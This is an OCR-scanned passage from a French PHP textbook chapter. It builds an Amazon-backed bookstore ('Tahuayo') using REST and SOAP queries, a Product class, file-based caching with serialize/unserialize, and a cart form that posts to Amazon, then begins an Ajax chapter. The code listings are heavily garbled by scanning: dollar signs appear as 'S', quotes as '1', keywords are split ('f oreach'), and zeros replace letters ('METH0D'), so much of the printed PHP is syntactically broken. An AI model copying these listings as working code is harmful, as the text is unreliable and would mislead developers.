' Request ' =>array ($request) ) ; 

// Effectue la vraie requete SOAP 

$result = $soap_proxy->ItemSearch($parameters) ; 

if (isSOAPError($result) ) { 
return false; 

} 

$this->totalResults = $result [ ' TotalResults ' ] ; 

f oreach ($result [' Items '][' Item ' ] as $product) { 
$this->products[ ] = new Product (Sproduct ) ; 

} 

unset (Ssoapclient) ; 
unset ($soap_proxy) ; 

} else { 

// Cree une URL et appelle parseXML pour la telecharger et 
// 1' analyser 

$this->url = "http://ecs.amazonaws.com/onca/xml?". 
"Service=" . $this->Service . 
"&Operation=" . $this->Operation . 
"&AssociateTag= " . $this->AssociateTag . 
"&AWSAccessKeyId=" .$this->AWSAccessKeyId . 
"&BrowseNode=" .$this->BrowseNode . 
"&ResponseGroup=" .$this->ResponseGroup. 
"&SearchIndex=" . $t his ->Search Index . 
"&Sort=" .$this->Sort. 
"&TotalPages=" .$this->TotalPages; 

$this->parseXML( ) ; 

} 

return $this->products ; 

} 



Selon la valeur de la constante METHOD, cette methode effectue la requete via REST ou 
SOAP. Cependant, dans les deux cas, les informations envoyees sont les memes. Les 
lignes suivantes, qui apparaissent au debut de la fonction, representent les variables de 
cette requete et leurs valeurs : 

$this->Service = "AWSECommerceService " ; 
$this->Operation = "ItemSearch" ; 
$this->AWSAccessKeyId = DEVTAG; 
$this->AssociateTag = ASSOCIATEID; 
$this->BrowseNode = $browseNode; 
$this->ResponseGroup = "Large"; 
$this->SearchIndex= $mode; 
$this->Sort= "salesrank"; 
$this->TotalPages= $page; 
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Certaines de ces valeurs sont initialisees dans d'autres parties de 1' application ; 
c'est le cas de SbrowseNode, $mode et $page. Les autres valeurs sont des constantes, 
comme DEVTAG et ASSOCIATEID. D'autres encore comme les valeurs de $this 
>Service, $this >Operation et $this >Sort sont statiques dans cette implemen- 
tation. 

Les variables minimales requises dependent du type de la requete : ici, on parcourt un 
nceud particulier en triant les articles sur le nombre de ventes, mais les variables neces- 
saires a une recherche d'un article specifique ou d'une recherche par mot-cle seront 
differentes. Vous pouvez consulter la liste de ces variables au debut des fonctions brow 
seNodeSearch(), ASINSearch() et keywordSearch ( ) dans le fichier AmazonResult- 
Set.php. Le guide du developpeur AWS contient en outre des informations detaillees sur 
les variables requises par tous les types de requetes. 

Nous allons maintenant etudier la creation de la requete dans la fonction browseNode 
Search ( ) pour les methodes REST et SOAP. Le format de cette creation dans les fonctions 
ASINSearch ( ) et keywordSearch ( ) utilise le meme concept. 

Utilisation de REST pour effectuer une requete et recuperer un resultat 

Les variables membres de la classe ayant deja ete initialisees au debut de la fonction 
browseNodeSearch ( ) (ou ASINSearch () ou keywordSearch ( )), il reste simplement a 
formater et a envoyer l'URL pour utiliser REST/XML par HTTP : 

$this->url = "http://ecs.amazonaws.com/onca/xml?". 
"Service=" .$this->Service. 
"&0peration=" .$this->Operation . 
"&AssociateTag= " . $this->AssociateTag . 
"&AWSAccessKeyId=" .$this->AWSAccessKeyId. 
"&BrowseNode=" .$this->BrowseNode . 
"&ResponseGroup=" .$this->ResponseGroup. 
"&SearchIndex=" . $t his ->Search Index . 
"&Sort=" .$this->Sort. 
"&TotalPages=" .$this->TotalPages; 

Ici, l'URL de base est http://ecs.amazonaws.com/onca/xml. On y ajoute les noms des 
variables et leurs valeurs pour former une chaine de requete GET. La documentation 
complete sur ces variables et les autres variables possibles se trouve dans le guide du 
developpeur AWS. 

Apres avoir configure tous ces parametres, il suffit d'appeler 
$this->parseXML( ) ; 

pour effectuer le veritable traitement. Le code de la methode parseXML( ) est presente 
dans le Listing 31.10. 
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Listing 31.10 : Methode parseXMLQ — Analyse du XML renvoye pour une requete 



// Analyse le XML dans des objets Product 
function parseXML() { 

// Supprime les erreurs car cela peut parfois 

$xml = @simplexml_load_f ile($this->url) ; 

if(!$xml) { 

// Essaie une seconde fois car le serveur peut etre occupe 
$xml = @simplexml_load_f ile ($this->url) ; 
if(!$xml) { 
return false; 

} 

} 

$this->totalResults = (integer)$xml->TotalResults; 
f oreach ($xml->Items->Item as SproductXML) { 
$this->products[ ] = new Product($productXML) ; 

} 

} 



C'est la fonction simplexml load file() qui effectue le gros du travail. Elle lit le 
contenu d'un document XML a partir d'un fichier ou, comme ici, d'une URL et fournit 
une interface orientee objet pour acceder aux donnees et a la structure de ce document. 
Cette interface est utile pour les donnees mais, comme on ne veut manipuler qu'un seul 
ensemble de fonctions interfaces pour travailler sur les donnees, qu'elles soient obte- 
nues via REST ou SOAR on peut construire sa propre interface orientee objet vers les 
memes donnees dans les instances de la classe Product. Vous remarquerez que, dans la 
version REST, on transtype les attributs de XML en types de variables PHR Sans ce 
transtypage, on obtiendrait des representations objets pour chaque element de donnees 
qui ne nous seraient pas tres utiles. 

La classe Product contient essentiellement des fonctions accesseurs pour lire les 
valeurs stockees dans ses membres prives : l'affichage du fichier complet n'est done pas 
tres interessant. En revanche, la structure de cette classe et le code de son constructeur 
meritent un coup d'ceil, c'est la raison pour laquelle nous les presentons dans le 
Listing 31.11. 

Listing 31.11 : La classe Product encapsule les informations disponibles sur un produit 
Amazon 



class Product { 

private $ASIN; 

private SproductName; 

private $releaseDate; 

private $manuf acturer; 

private $imageUrlMedium; 

private SimageUrlLarge; 

private $listPrice; 

private $ourPrice; 
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private $salesRank; 

private $availability ; 

private SavgCustomerRating; 

private $authors = array(); 

private $reviews = array(); 

private $similarProducts = array(); 

private $soap; // Tableau renvoye par les appels SOAP 

function construct ($xml) { 

if (METH0D=='S0AP' ) { 

$this->ASIN = $xml[ ' AS I N ' ] ; 

$this->productName = $xml[ 1 ItemAttributes '][' Title '] ; 

if (is_array($xml[ ' ItemAttributes' ][ 'Author' ] ) != "") { 
foreach ($xml[ 1 ItemAttributes '][ 'Author 1 ] as $author) { 
$this->authors[ ] = $author; 

} 

} else { 

$this->authors[ ] = $xml[ 1 ItemAttributes '][ 'Author '] ; 

} 

$this->releaseDate = 

$xml[ 1 ItemAttributes ' ] [ ' PublicationDate ' ] ; 
$this->manuf acturer = 

$xml[ ' ItemAttributes ' ] [ ' Manufacturer 1 ] ; 
$this->imageUrlMedium = $xml[ ' Mediumlmage ' ] [ ' URL ' ] ; 
$this->imageUrlLarge = $xml[ 1 Largelmage ' ] [ ' URL ' ] ; 

$this->listPrice = 

$xml[ ' ItemAttributes ' ] [ ' ListPrice ' ] [ ' FormattedPrice ' ] ; 
$this->listPrice = str_replace ( ' $ ' , '', $this->listPrice) ; 
$this->listPrice = str_replace ( ' , ' , '', $this->listPrice) ; 
$this->listPrice = f loatval($this->listPrice) ; 

$this->ourPrice = 

$xml[ ' Of f erSummary 1 ] [ 1 Lowest NewPrice ' ] [ ' FormattedPrice ' ] ; 
$this->ourPrice = str_replace( ' $ ' , '', $this->ourPrice) ; 
$this->ourPrice = str_replace( 1 , ' , '', $this->ourPrice) ; 
$this->ourPrice = floatval($this->ourPrice) ; 

$this->salesRank = $xml[ 1 SalesRank 1 ] ; 
$this->availability = 

$xml[ 'Offers' ] [ 'Offer' ] [ ' Of f erListing 1 ] [ 'Availability' ] ; 
$this->avgCustomerRating = 

$xml[ ' CustomerReviews ' ] [ ' AverageRating 1 ] ; 

$reviewCount = 0; 

if (is_array($xml[ 'CustomerReviews '][' Review' ]) ) { 

foreach ($xml[ 1 CustomerReviews 1 ][' Review' ] as $review) { 
$this->reviews[$reviewCount] [ ' Rating 1 ] = 

$review[ 1 Rating 1 ] ; 
$this->reviews[$reviewCount] [ 'Summary' ] = 

$review[ 1 Summary ' ] ; 
$t his ->re views [$reviewCount] [' Content ' ] = 
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$review[ ' Content ' ] ; 

$reviewCount++; 

} 

} 

SsimilarProductCount = 0; 

if (is_array ($xml[ ' SimilarProducts ' ] [ ' SimilarProduct ' ] ) ) { 
foreach($xml[ 'SimilarProducts' ] [ 'SimilarProduct ' ] as 
Ssimilar) { 

$this->similarProducts[$similarProductCount] [ 'Title' ] = 

$similar[ 'Title ' ] ; 
$this->similarProducts[$similarProductCount] [ 'ASIN' ] = 

$review[ 'ASIN ' ] ; 
$similarProductCount++; 

} 



} else { 

// Utilisation de REST 

$this->ASIN = (string)$xml->ASIN; 

$this->productName = (string)$xml->ItemAttributes->Title; 
if ($xml->ItemAttributes->Author) { 

f oreach ($xml->ItemAttributes->Author as $author) { 
$this->authors[ ] = (string)$author; 

} 

} 

$this->releaseDate = 

(string)$xml->ItemAttributes->PublicationDate ; 
$this->manuf acturer = 

(string)$xml->ItemAttributes->Manuf acturer ; 
$this->imageUrlMedium = (string)$xml->MediumImage->URL; 
$this->imageUrlLarge = (string)$xml->LargeImage->URL; 

$this->listPrice = 

(string)$xml->ItemAttributes->ListPrice->FormattedPrice ; 
$this->listPrice = str_replace ( ' $ ' , '', $this->listPrice) ; 
$this->listPrice = str_replace ( ' , ' , '', $this->listPrice) ; 
$this->listPrice = f loatval($this->listPrice) ; 

$this->ourPrice = 

(string)$xml->Of f erSummary->LowestNewPrice->FormattedPrice ; 
$this->ourPrice = str_replace( ' $ ' , '', $this->ourPrice) ; 
$this->ourPrice = str_replace( ' , ' , '', $this->ourPrice) ; 
$this->ourPrice = floatval($this->ourPrice) ; 

$this->salesRank = (string)$xml->SalesRank; 
$this->availability = 

(string)$xml->Of f ers->0f f er->Of f erListing->Availability ; 
$this->avgCustomerRating = 

(f loat )$xml->Cust omerRe views- >AverageRating ; 



$reviewCount = 0; 
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if ($xml->CustomerReviews->Review) { 
foreach ($xml->CustomerReviews->Review as $review) { 
$this->reviews [$reviewCount ] [ 1 Rating 1 ] = 

(f loat )$review->Rating ; 
$this->reviews [$reviewCount ] [ 1 Summary 1 ] = 

( st ring )$ review- >Summary; 
$t his- >re views [$reviewCount ] [ ' Content ' ] = 

(string)$review->Content ; 

$reviewCount++; 

} 

} 

SsimilarProductCount = 0; 

if ($xml->SimilarProducts->Similar Product ) { 

foreach ($xml->SimilarProducts->SimilarProduct as 
$similar) { 

$this->similarProducts[$similarProductCount] [ ' Title ' ] = 

(string)$similar->Title; 
$this->similarProducts[$similarProductCount] [ ' ASIN ' ] = 

(string)$similar->ASIN; 
$similarProductCount++; 

} 

} 

} 

} 

// La plupart des methodes de cette classe se ressemblent et 
// renvoient simplement la variable privee 
function similarProductCount ( ) { 

return count ($this->similarProducts) ; 

} 

function similarProduct ($i) { 

return $this->similarProducts[$i] ; 

} 

function customerReviewCount ( ) { 
return count ($this->reviews) ; 

} 

function customerReviewRating ($i) { 
return $this->reviews[$i] [ ' Rating 1 ] ; 

} 

function customerReviewSummary ($i) { 
return $this->reviews[$i] [ ' Summary ' ] ; 

} 

function customerReviewComment ($i) { 
return $t his- > re views [$i] [' Content '] ; 

} 



function valid() { 

if (isset($this->productName) && ($this->ourPrice>0 . 001 ) && 
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isset($this->ASIN) ) { 
return true; 
} else { 

return false; 

} 

} 

function ASIN() { 

return padASIN($this->ASIN) ; 

} 

function imageURLMedium( ) { 
return $this->imageUrlMedium; 

} 

function imageURLLarge ( ) { 
return $this->imageUrlLarge ; 

} 

function productName ( ) { 
return $this->productName ; 

} 

function ourPrice() { 

return number_format($this->ourPrice,2, ''); 

} 

function listPrice() { 

return number_format($this->listPrice,2, ''); 

} 

function authors() { 

if (isset ($this->authors) ) { 

return $this->authors ; 
} else { 

return false; 

} 



function releaseDate ( ) { 

if (isset ($this->releaseDate) ) { 

return $this->releaseDate ; 
} else { 

return false; 

} 



function avgCustomerRating ( ) { 

if (isset ($this->avgCustomerRating) ) { 

return $this->avgCustomerRating ; 
} else { 

return false; 

} 



function manuf acturer( ) { 
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if (isset ($this->manuf acturer) ) { 
return $this->manuf acturer ; 

} else { 

return false; 

} 

} 

function salesRank() { 

if (isset ($this->salesRank) ) { 

return $this->salesRank ; 
} else { 

return false; 

} 

} 

function availability ( ) { 

if (isset ($this->availability) ) { 

return $this->availability ; 
} else { 

return false; 

} 

} 

} 



La aussi, ce constructeur prend deux formes de donnees d' entrees differentes et cree 
une seule interface. Vous remarquerez que, meme si une partie de ce code aurait pu etre 
plus generique, certains attributs epineux comme les commentaires des lecteurs ont des 
noms differents en fonction de la methode. 

Maintenant que nous avons passe en revue la recuperation des donnees, nous pouvons 
redonner le controle a getARS() et, de la, a showBrowseNode ( ). L'etape suivante est 
done : 

showSummary ($ars->products ( ) , $page, 

$ars->totalResults( ) , $mode, 
$browseNode) ; 

La fonction showSummary ( ) affiche simplement les donnees de l'objet AmazonResult 
Set, telles que vous pouvez les voir a la Figure 31.1. Nous ne presenterons done pas son 
code ici. 

Utilisation de SOAP pour effectuer une requete et recuperer un resultat 

Revenons en arriere sur la version SOAP de la fonction browseNodeSearch ( ). Nous 
repetons ici la section du code qui nous interesse : 

$soapclient = new nusoap_client ( 

' http : / /ecs . amazonaws . com/AWSECommerceService/AWSECommerceService .wsdl ' , 
'wsdl ' ) ; 
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$soap_proxy = $soapclient->getProxy ( ) ; 

$request = array ('Service' => $this->Service, 

'Operation' => $this->Operation , 

' BrowseNode ' => $this->BrowseNode, 

' ResponseGroup ' => $this->ResponseGroup, 

' Searchlndex ' => $this->SearchIndex, 

'Sort ' => $this->Sort, 

'TotalPages' => $this->TotalPages) ; 

$parameters = array ( ' AWSAccessKey Id ' => DEVTAG, 

'AssociateTag ' => ASSOCIATEID, 
'Request'=>array($request) ) ; 

// Effectue la veritable requete SOAP 

$result = $soap_proxy->ItemSearch($parameters) ; 

if (isSOAPError($result) ) { 
return false; 

} 

$this->totalResults = $result[ ' TotalResults ' ] ; 

foreach($result[ ' Items' ][' Item' ] as $product) { 
$this->products[ ] = new Product ($product) ; 

} 

unset ($soapclient) ; 
unset ($soap_proxy) ; 

II n'y a aucune fonction supplementaire a etudier ici car le client SOAP s'occupe de 
tout. 

On commence par creer une instance du client SOAP : 

$soapclient = new nusoap_client ( 

' http : / /ecs . amazonaws . com/AWSECommerceService/AWSECommerceService .wsdl ' , 
'wsdl ' ) ; 

Ici, on lui fournit deux parametres : la description WSDL du service et une chaine indi- 
quant au client que le premier parametre est une URL WSDL. Nous aurions egalement 
pu nous contenter d'un seul parametre : l'extremite du service, c'est-a-dire l'URL 
directe du serveur SOAP. 

Nous avons choisi de proceder ainsi pour une bonne raison, dont vous pouvez vous 
rendre compte dans la ligne suivante du code : 

$soap_proxy = $soapclient->getProxy ( ) ; 

Celle-ci cree une classe en utilisant les informations situees dans le document WSDL. 
Cette classe, le mandataire SOAP, disposera de methodes correspondant a celles du 
service web, ce qui facilite beaucoup les choses puisque nous pouvons ainsi interagir 
avec le service web comme s'il s'agissait d'une classe PHP locale. 
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Puis nous creons un tableau contenant les elements que nous devons passer a la requete 
browsenode : 

$request = array ('Service' => $this->Service, 

'Operation' => $this->Operation , 

' BrowseNode ' => $this->BrowseNode, 

' ResponseGroup ' => $this->ResponseGroup, 

1 Searchlndex ' => $this->SearchIndex, 

'Sort ' => $this->Sort, 

'TotalPages' => $this->TotalPages) ; 

II reste deux elements a passer a la requete : AWSAccessKeylD et AssociateTag. Ces 
elements, plus ceux de $request, sont places dans un autre tableau nomme $parameters : 

Sparameters = array ( ' AWSAccessKey Id ' => DEVTAG, 

'AssociateTag' => ASSOCIATEID, 
'Request'=>array($request) ) ; 

En utilisant la classe proxy, il suffit alors d'appeler les methodes du service web en leur 
passant ce tableau de parametres : 

$result = $soap_proxy->ItemSearch($parameters) ; 

$result est un tableau que vous pouvez directement stacker comme un objet Product 
dans le tableau products de la classe AmazonResultSet. 

Mise en cache des reponses a une requete 

Revenons a la fonction getARS( ) et au probleme de la mise en cache. Voici a nouveau 
le code de cette fonction : 

// Recupere un AmazonResultSet a partir du cache ou d'une vraie requete. 
Dans ce dernier cas, il est ajoute au cache. 

function getARS($type, $parameters) { 
$cache = cached ($type , $parameters) ; 
if ($cache) { 

// Si on l'a trouve dans le cache 
return $cache; 
} else { 
$ars = new AmazonResultSet; 
if ($type == ' asin ' ) { 

$ars->ASINSearch(padASIN($parameters[ 'asin' ] ) , 
$parameters [ ' mode ' ] ) ; 

} 

if($type == 'browse') { 

$ars->browseNodeSearch ($parameters [ 'browsenode' ] , 
$parameters [ ' page ' ] , $parameters [ ' mode ' ] ) ; 

} 

if ($type == ' search ' ) { 

$ars->keywordSearch ($parameters [' search '] , 
$parameters[ 'page' ] , 
Sparameters [ ' mode ' ] ) ; 

} 
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cache($type, $parameters, $ars); 

} 

return $ars; 

} 

Toute la mise en cache SOAP et XML de l'application est realisee dans cette fonction, 
tandis que la mise en cache des images est geree par une autre fonction. On commence 
par appeler la fonction cached ( ) pour savoir si l'objet AmazonResultSet voulu est deja 
dans le cache. Si c'est le cas, on le renvoie au lieu d'adresser une nouvelle requete a 
Amazon : 

$cache = cached($type, $parameters) ; 
if ($cache) { 

// Si on l'a trouve dans le cache 

return $cache; 

} 

Sinon, lorsqu'on a recupere les donnees provenant d' Amazon, on les ajoute au cache : 

cache($type, $parameters, $ars); 
Le code des deux fonctions cached () et cache () est presente dans le Listing 31.12. 
Elles implementent la mise en cache exigee par Amazon dans ses conditions d'utilisa- 
tion du service. 

Listing 31.12 : Fonctions cachedQ et cacheQ de cachefunctions.php 



II Verifie si une donnee d 'Amazon est dans le cache. 
// Si c'est le cas, on la renvoie 
// Sinon, on renvoie false 
function cached($type, $parameters) { 
if($type == 'browse') { 

$filename = CACHE . 1 /browse .'. $parameters [' browsenode '].'. ' 

.$parameters[ ' page '].'.' .$parameters[ ' mode ' ] . ' .dat ' ; 

} 

if($type == 'search') { 

$filename = CACHE . 1 /search .'. $parameters [' search ']. 1 . 1 

.$parameters[ ' page '].'.' .$parameters[ ' mode ' ] . ' .dat ' ; 

} 

if ($type == ' asin 1 ) { 

$filename = CACHE .' /asin .'. Sparameters [' asin '].'. ' 
.$parameters[ 'mode ' ] . ' .dat ' ; 

} 

// La donnee n'est pas dans le cache ou a plus d'une heure ? 
if ( !f ile_exists($f ilename) || 

((mktimeO - f ilemtime($f ilename) ) > 60*60)) { 
return false; 

} 

$data = file_get_contents($f ilename) ; 
return unserialize ($data) ; 



// Ajoute les donnees d 'Amazon au cache 
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function cache($type, $parameters, $data) { 
if($type == 'browse') { 

$filename = CACHE .' /browse .'. $parameters [' browsenode '].'. ' 

.$parameters[ ' page '].'.' .$parameters[ ' mode ' ] . ' .dat ' ; 

} 

if($type == 'search') { 

$filename = CACHE .' /search .'. $parameters [' search ']. 1 . 1 

.$parameters[ ' page '].'.' .$parameters[ ' mode ' ] . ' .dat ' ; 

} 

if ($type == ' asin ' ) { 

$filename = CACHE . 1 /asin .'. $parameters [' asin 1 ]. 1 . 1 
.$parameters[ 'mode ' ] . ' .dat ' ; 

} 

$data = serialize($data) ; 

$fp = f open ($f ilename , 'wb'); 

if(!$fp || (fwrite($fp, $data)==-1)) { 

echo ('<p>Error, could not store cache file'); 

} 

fclose($f p) ; 

} 



En examinant ce code, vous pouvez constater que les fichiers du cache sont stockes 
sous un nom qui est forme du type de la requete suivi des parametres de la requete. La 
fonction cache ( ) stocke les resultats en les serialisant, tandis que la fonction cached ( ) 
les deserialise. Celle-ci ecrasera egalement toutes les donnees vieilles de plus d'une 
heure, comme cela est indique dans les termes et les conditions. 

La fonction serialize ( ) transforme des donnees d'un programme en chaine qui peut 
ensuite etre stockee. Ici, on cree une representation stockable d'un objet AmazonRe 
sultSet. L'appel a unserialize( ) fait l'inverse, en retransformant la version stockee 
en structure de donnees en memoire. Deserialiser un objet comme celui-ci necessite 
evidemment de disposer de la definition de la classe dans le fichier pour que la classe 
soit comprehensible et utilisable une fois qu'elle aura ete rechargee. 

Dans cette application, la recuperation d'un resultat a partir du cache s'effectue en une 
fraction de seconde, tandis qu'une nouvelle requete peut prendre jusqu' a 10 secondes. 

Construction du panier virtuel 

Que pouvons-nous faire avec toutes ces fonctionnalites que nous offre Amazon ? 
L application la plus evidente est la construction d'un panier virtuel mais, comme on l'a 
deja decrit en detail au Chapitre 26, nous ne nous y attarderons pas beaucoup ici. 

Les fonctions permettant de manipuler un panier virtuel sont presentees dans le 
Listing 31.13. 
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Listing 31.13 : cartfunctions.php — Implementation du panier virtuel 



<?php 

require_once( ' AmazonResultSet . php ' ) ; 

// Utilisation de la fonction show/Summary ( ) de bookdisplay . php 
// pour afficher le contenu courant du panier 

function showCart ($cart , $mode) { 

// Construction d'un tableau a passer 
$products = array ( ) ; 
foreach($cart as $ASIN=>$product) { 
$ars = getARS( ' asin ' , array ( 1 asin 1 =>$ASIN, 1 mode ' =>$mode) ) ; 
if($ars) { 
$products[] = $ars->getProduct (0) ; 

} 

} 

// Construction du formulaire pour faire le lien avec un panier 
// sur le site d'Amazon 
echo "<f rm method=\ " POST\ " 

action=\ "http: / /www. amazon .com/ gp/aws/ cart /add . html\ ">" ; 

foreach($cart as $ASIN=>$product) { 
$quantity = $cart[$ASIN] [ 'quantity 1 ] ; 
echo "<input type=\ " hidden\ " name=\ "ASIN . " .$ASIN . " \ " 

value=\" ".$ASIN."\">"; 
echo "<input type=\ "hidden\ " name=\ "Quantity. " .$ASIN. "\" 

value=\" ".$quantity."\">"; 

} 

echo "<input type=\ " hidden\ " name=\ "SubscriptionId\ " 
value=\" " .DEVTAG. "\"> 
<input type=\ "hidden\ " name=\ "AssociateTag\ " 

value=\" " .ASSOCIATEID. "\"> 
<input type=\ "image\ " src=\ "images/checkout .gif\ " 
name=\ " submit . add- to- cart \ " value=\ "Buy 
From Amazon . com\ "> 
When you have finished shopping press checkout to add all 
the items in your Tahuayo cart to your Amazon cart and 
complete your purchase. 
</f orm> 

<br/><a href =\ " index . php?action=emptycart \ "><img 
src=\"images/emptycart.gif \" alt=\"Empty Cart\" 
border=\"0\"></a> 

If you have finished with this cart, you can empty it 

of all items. 

</f orm> 

<br /> 

<h1>Cart Contents</h1>" ; 
showSummary($products, 1, count (Sproducts) , $mode, 0, true); 



// Affiche le petit resume du panier qui apparait toujours a 

// l'ecran. On ne montre que les trois derniers articles ajoutes. 
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function showSmallCart ( ) { 
global $_SESSION; 

echo "<table border=\"1\" cellpadding=\ "1 \ " cellspacing=\ "0\ "> 
<tr><td class=\ "cartheading\ ">Your Cart $". 
number_format(cartPrice( ) , 2) . "</td></tr> 
<tr><td class=\"cart\">" .cartContents() . "</td></tr>" ; 

// Formulaire pour etablir le lien avec le panier d'Amazon.com 
echo "<form method=\ "P0ST\ " 

action=\ " http : / /www. amazon . com /gp/aws/ cart /add . html\ "> 
<tr><td class=\ " cart heading \ "><a 

href=\ " index . php?action=showcart\ "><img 

src=\ " images/ details. gif \ " border=\ "0\ "></a>" ; 

foreach($_SESSION[ ' cart ' ] as $ASIN=>$product) { 
$quantity = $_SESSI0N[ ' cart '] [$ASIN] [' quantity '] ; 
echo "<input type=\ " hidden\ " name=\"ASIN. " .$ASIN. "\" 

value=\" ".$ASIN."\">"; 
echo "<input type=\ "hidden\ " name=\ "Quantity. " .$ASIN. "\" 

value=\ " " .$quantity . "\ ">" ; 

} 

echo "<input type=\ " hidden\ " name=\ "SubscriptionId\ " 
value=\" " .DEVTAG. "\"> 
<input type=\ "hidden\ " name=\ "AssociateTag\ " 

value=\ " " .ASSOCIATEID. " \ "> 
<input type=\ "image\ " src=\ "images/checkout .gif\ " 

name=\ " submit . add-to-cart\ " value=\"Buy From 
Amazon . com\ "> 
</td></tr> 
</f orm> 
</table>"; 



// Affiche les trois derniers articles ajoutes au 
function cartContents ( ) { 
global $_SESSION; 

$display = array_slice($_SESSION[ 'cart ' ] , -3, 3); 
// we want them in reverse chronological order 
$display = array_reverse($display, true); 

$result = ' ' ; 
$counter = 0; 

// Abrege les noms s'ils sont trop longs 
foreach($display as $product) { 

if (strlen($product[ 'name' ] )<=40) { 
$result .= $product[ ' name ' ] . "<br />"; 

} else { 

$result .= substr($product[ 'name' ] , 0, 37)."...<br />"; 

} 

$counter++; 

} 
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// Ajoute des lignes blanches au panier s'il est presque vide, 
// afin que l'affichage reste le meme. 

for( ;$counter<3; $counter++) { 
$result .= "<br />" ; 

} 

return $result; 

} 

// Calcule le prix total des articles du panier 
function cartPrice() { 

global $_SESSION; 

$total = 0.0; 

foreach($_SESSION[ ' cart ' ] as $product) { 
$price = str_replace( '$' , '', $product[ 'price' ]) ; 
$total += $price*$product[ 'quantity '] ; 

} 

return $total; 

} 

// Ajoute un article au panier 

// II n'existe pas actuellement de moyen d'en ajouter plusieurs a 
// la fois 

function addToCart (&$cart , $ASIN, $mode) { 
if (isset($cart[$ASIN] )) { 

$cart[$ASIN] [ 'quantity ' ] +=1; 
} else { 

// Verifie que l'ASIN est correct et recherche le prix 

$ars = new AmazonResultSet ; 

$product = $ars->ASINSearch($ASIN, $mode); 

if ($product->valid( ) ) { 

$cart[$ASIN] = array( ' price ' =>$product->ourPrice ( ) , 

'name' => $product->productName ( ) , 'quantity' => 1) ; 

} 

} 

} 

// Supprime du panier toutes les instances d'un article donne 
function deleteFromCart (&$cart , $ASIN) { 
unset ($cart[$ASIN] ) ; 

} 

?> 



Par rapport a la version precedente, le fonctionnement de ce panier presente quelques 
differences. Dans la fonction addToCart ( ) , par exemple, on peut verifier qu'un article a 
un ASIN correct avant de 1' ajouter et on peut rechercher son prix courant (ou, au moins, 
celui qui est dans le cache). 

Le probleme vraiment interessant ici consiste a savoir comment renvoyer les donnees a 
Amazon lorsqu'un client passe sa commande. 
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Passer la commande aupres d'Amazon 

Void la partie concernee du Listing 31.13 : 

// Construction du formulaire pour faire le lien avec un panier 
// sur le site d'Amazon 
echo "<form method=\ " POST\ " 

action=\ "http: / /www. amazon .com/ gp/aws/ cart /add . html\ ">" ; 

foreach($cart as $ASIN=>$product) { 
$quantity = $cart[$ASIN] [ 'quantity 1 ] ; 
echo "<input type=\ " hidden\ " name=\ "ASIN. " .$ASIN. "\" 

value=\" ".$ASIN."\">"; 
echo "<input type=\ " hidden\ " name=\ "Quantity. " .$ASIN. "\" 

value=\ " " . $quantity . " \ ">" ; 



echo "<input type=\ " hidden\ " name=\ "SubscriptionId\ " 
value=\" " .DEVTAG. "\"> 
<input type=\ "hidden\ " name=\ "AssociateTag\ " 

value=\ " " .ASSOCIATEID. " \ "> 
<input type=\ "image\ " src=\ "images/checkout .gif\ " 
name=\ " submit . add- to- cart \ " value=\ "Buy 
From Amazon . com\ "> 
When you have finished shopping press checkout to add all 
the items in your Tahuayo cart to your Amazon cart and 
complete your purchase. 
</form>" 

Le bouton Checkout est un bouton de validation de formulaire qui connecte le panier a 
un panier d' achat sur Amazon. On envoie les ASIN, les quantites et l'ID d'associe via 
des variables POST, c'est tout ! La Figure 31.5, plus haut dans ce chapitre, montre le 
resultat obtenu lorsque Ton clique sur ce bouton. 

La seule difficulte avec cette interface est qu'il s'agit d'un echange unidirectionnel : on 
peut ajouter des articles au panier d'Amazon, mais on ne peut pas en oter. Ceci signifie 
que les clients ne peuvent pas passer d'un site a 1' autre sans risquer de dupliquer les 
articles dans leurs paniers. 



Installation du code du projet 

Pour installer le code du projet de ce chapitre, vous devrez realiser plusieurs etapes. 
Apres avoir place le code a 1' emplacement approprie sur votre serveur, effectuez les 
operations suivantes : 

■ Creez un repertoire cache. 

■ Fixez les permissions sur ce repertoire pour que les scripts aient le droit d'y ecrire. 

■ Modifiez constants. php pour indiquer l'emplacement exact du cache. 

■ Inscrivez-vous sur Amazon pour obtenir un jeton developpeur. 
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■ Modifiez constants.php pour y inclure votre jeton developpeur et, eventuellement, 
votre identifiant d'associe. 

■ Assurez-vous que NuSOAP est installe. Nous l'avons place dans le repertoire 
Tahuayo, mais vous pourriez le deplacer et changer le code. 

■ Verifiez que votre version de PHP a ete compilee avec le support de simpleXML. II 
est active par defaut. 

Extension du projet 

Vous pourriez aisement deployer ce projet en etendant les types des recherches possi- 
bles via Tahuayo. Pour trouver de l' inspiration, suivez les liens vers les exemples 
d' applications qui se trouvent sur le centre de ressource des services web d'Amazon. 
Regardez dans les sections Articles and Tutorials et Community Code pour y trouver 
plus d' informations. 

Vous n'etes pas limite aux paniers virtuels : vous pouvez construire beaucoup d'autres 
choses avec ces donnees. 

Pour aller plus loin 

II existe des milliers de livres et de ressources en ligne consacres a XML et aux services 
web. Le W3C est un bon point de depart, mais vous pouvez egalement consulter la page 
du groupe de travail sur XML, http://www.w3.org/XML/Core/, et la page Web Services 
Activity, http://www.w3.org/2002/ws/. Et ce n'est qu'un debut. 
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Construction d ' applications 

web 2.0 avec Ajax 



Le Web a commence comme un ensemble de pages statiques contenant du texte et 
des liens vers des fichiers images, audio et video. Pour l'essentiel, il existe toujours 
sous cette forme, bien qu'un grand nombre de pages de texte et de contenus multi- 
media soient produites dynamiquement par des applications qui s'executent sur les 
serveurs web : c'est ce que nous avons fait tout au long de ce livre. Cependant, 
l'avenement du Web 2.0 a conduit les developpeurs a trouver de nouvelles methodes 
d'interaction entre les utilisateurs, les serveurs web et les bases de donnees qui stockent les 
informations dont ils ont besoin. Parmi elles, la programmation Ajax (Asynchronous 
JavaScript and XML) est la methode qui est actuellement la plus utilisee pour amelio- 
rer cette interactivite tout en reduisant le temps necessaire a la recuperation des 
elements statiques. 



— Info 

Pour mieux comprendre le concept du Web 2.0, lisez I'article de Tim O'Reilly, disponible 
sur la page http://www.oreillynet.com/pub/a/oreilly/tim/news/2005/09/30/what-is- 
web-20.html. 



Dans ce chapitre, nous presenterons une introduction a la programmation Ajax et nous 
fournirons quelques exemples que vous pourrez integrer dans vos applications. Ce 
chapitre ne se veut en aucun cas exhaustif sur le sujet, mais il vous donnera de bonnes 
bases pour apprehender ces technologies. 
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Introduction a Ajax 

En lui-meme, Ajax n'est pas un langage de programmation ni meme une technologic 
En effet, la programmation Ajax est une combinaison de JavaScript cote client avec des 
transferts de donnees formates en XML et une programmation cote serveur avec des 
langages comme PHP. En outre, la presentation des elements Ajax passe par XHTML et 
les feuilles de style CSS. 

